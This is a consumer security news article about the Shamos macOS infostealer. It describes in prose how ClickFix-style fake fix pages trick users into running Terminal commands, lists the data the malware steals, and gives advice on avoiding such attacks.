‘Shamos’ is a new infostealer that's being used to target vulnerable Macs but it's also the latest in a long list of malware taking advantage of ClickFix-style attacks to trick users into downloading malicious software disguised as legitimate programs.
Bleeping Computer reports that Shamos is a variant of AMOS (or the Atomic macOS Stealer) and was developed by the COOKIE SPIDER cybercriminal group. It disguises itself as a guide, manual or troubleshooting fix online in order to fool users into downloading it so it can steal sensitive data and credentials from their browsers, as well as Keychain items, Apple Notes and cryptocurrency wallets.
CrowdStrike first detected Shamos and according to the cybersecurity firm, hackers have attempted to infect over three hundred of the environments that they monitor using this new malware strain since June. It's spread through malvertising or fake GitHub repositories using ClickFix attacks which prompt targets into executing shell commands in the macOS Terminal. The hackers encourage users to run the commands by getting them to ‘fix’ an error or by installing software. Instead of fixing an issue or problem though, they're actually infecting their own devices with info-stealing malware.
CrowdStrike found a few specifically spoofed pages such as mac-safer[.]com or rescue-mac[.]com that claim to provide user assistance with common macOS problems that are often searched for online. The pages contain instructions that direct users in need to copy and paste a command to ‘fix’ the issue; again though, instead of making appropriate changes or repairs to the system, the user is instead downloading a command that decodes a Base64-encoded URL which in turn fetches a malicious Bash script from a remote server. The script then captures the user's password and downloads the Shamos mach-O executable, before executing the malware.
Once it’s been installed, it runs commands for data collection so it can take information from the an infected device like cryptocurrency wallet files, Keychain data, Apple Notes data and information stored in their browser. It bundles all of this stolen data, packages it into an archive named out.zip and sends it back to the hackers behind this campaign using curl.
ClickFix style attacks have become increasingly popular in malware distribution and have been found in a variety of places from TikTok videos, CAPTCHAS or fixes for fake Google Meet errors. They’re popping up more and more frequently because they’ve been successful in spreading malware, in ransomware attacks and even in state-sponsored attacks launched by more sophisticated hackers.
The malware can also ensure persistence via automatic execution on system startup (in cases when it runs with sudo privileges), and it can download additional payloads onto the victim’s home directory as CrowdStrike has observed instances where the threat actors have additionally dropped a spoofed Ledger Live wallet app and a botnet module.
How to stay safe from Mac malware
If you are a macOS user, do not execute commands on your system if you found them online, especially if you don't fully understand what they are, where they come from and what they do.
This also applies to GitHub repositories, because this platform is known to host malicious projects designed to infect users who download things without being worried that they may be malicious
If you are experiencing issues with macOS, avoid sponsored search results and seek help directly from the Apple Community forums which are moderated by Apple or via the system’s built-in Help menu.
Also, with the best Mac antivirus software, you can add an extra layer of security to your computer to protect against malware and other viruses. At the same time, paid antivirus apps often include extra security features to help protect your privacy and security online like a VPN, a password manager or a hardened browser that's more secure to use when conducting financial transactions.
Given how successful they've been in the past and how they have victims infect their own devices with malware, ClickFix attacks aren't going anywhere anytime soon. Hopefully Apple and Microsoft come up with a way to mitigate them but until then, it's up to you to be extra careful online and avoid falling for these kinds of attacks.
Follow Tom's Guide on Google News to get our up-to-date news, how-tos, and reviews in your feeds. Make sure to click the Follow button.
More from Tom's Guide
- Two-factor authentication provides an easy way to secure your accounts — here's how it works and how to enable it
- AI browsers can’t tell legitimate websites from malicious ones — here’s why that’s putting you at risk
- Major flaw in top password managers lets hackers steal your login details, 2FA codes, credit card info and more
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.
